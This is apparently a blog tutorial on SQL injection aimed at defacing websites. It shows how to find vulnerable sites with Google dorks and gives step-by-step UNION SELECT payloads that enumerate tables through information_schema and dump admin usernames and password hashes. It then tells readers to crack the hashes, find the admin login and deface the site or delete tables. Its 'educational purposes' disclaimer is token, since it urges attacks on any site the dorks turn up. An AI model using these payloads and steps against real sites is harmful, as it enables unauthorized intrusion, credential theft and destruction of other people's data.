What is SQL Injection?

SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT,DELETE are used to update information in the database.

In this type of Attack, we make use of a vulnerability where in we supply our own commands to the website’s database and successfully deface it :D . This vulnerability occurs when the user’s input is not filtered or improperly filtered .

Step 1: Looking for the Vulnerability

www.something.com/news/news.php?id=130

The above code can be vulnerable to SQL injection. The above code is taking the ID as 130 and returning some values. . To see if the URL is vulnerable , put a ‘ at the end of the URL. So try this URL

www.something.com/news/news.php?id=130

Now If you get an error something like it’s not a valid MYSQL statement or something like that, then it is possible to exploit this URL.  Example : When I did it on a website vulnerable to this exploit, I got the following

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

One more thing, if the URL also ends in .php?catid=x , where x is a number, even then you can use this above method to see if the site is vulnerable.

So, now you know if the website is vulnerable or not, but how do you find websites which are vulnerable? Easy ! You use a google dork to do this. So you are going to use google to find websites vulnerable. So type the following in google:

1.  inurl:.php?id=

2. inurl:.php?catid=

So now you will get a list of websites. Test them one by one in the above method mentioned, to see if its vulnerable.

Step 2: Exploiting the vulnerability

This tutorial is only for educational purposes. Kindly do not misuse it.

You have a vulnerable URL

www.something.com/news/news.php?id=130

Ok , Now how do you deface it   ??

Finding number of columns

Now put the following in the url

http://www.something.com/news/news.php?id=130 order by 10–

Now we told the database to order it by 10th column. Your job is to find how many columns are there in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply put 11 and try.

Also, the — “are two dashes – -” in the end means “comment”. So anything after this statement is commented off and only our query is put in.

So assume I got error for order by 10, then I tried order by 9 and so on.. Finally I got no error at 6 and error at 7. Hence, the Table has 6 columns .

Find Vulnerable columns

Now we will use union all and select command to find a vulnerable column.Remember to replace that ID number by – that. Like here, I have made it id= -130.

http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,–

Since it has 6 columns, we do select all 1,2,3,4,5,6 and a – at the end.

This will give an output . Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.

Finding tables

Now our job is to find the different tables in the database. We do the following:

http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where  table_schema=database() –

Here group_concat(table_name) will give you all the table names in the database. Infromation_schema hold information about the database. So we are just querying from that .

Finding Column names

Similarly get all the columns by simply replacing ‘table’ with ‘column’

http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()–

Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be a “id” and then all columns from next table and so on.

If this doesn’t work then you can do

http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where  table_name=”some table you got from the previous step”–

Final Step

Now in list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want. Eg username and password columns from tbl_admin table

http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin–

Now I just put the column names in the group_concat with 0x3a in between which is ascii for colon and tbl_admin is the table name where these columns are.

Now I got output something like

admin:”encrypted hash”,user2:”encrypted hash”, and so on…

So usernames are  not encrypted here and passwords are encrypted.

So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google :P .

Defacing

Now you have the admin username and admin password from the previous step.Now you have to find the admin page of the site.

Goto http://tools.th3-0utl4ws.com/admin-finder/ and put in your website there.

It will give you the admin page after sometime.

Mine turned out to be  http://www.something.com/admin

So here you get a login box. Put in the username and password of the admin and that’s it. You are in :D

Now do whatever you want, like defacing or deleting tables etc…

There is a reason i have not told you what the something.com is. You can use the google dorks i mentioned to find any vulnerable site.

This tutorial is only for educational purposes. Kindly do not misuse it.I am not responsible for anything .

Any comments/feedback is appreciated.

About these ads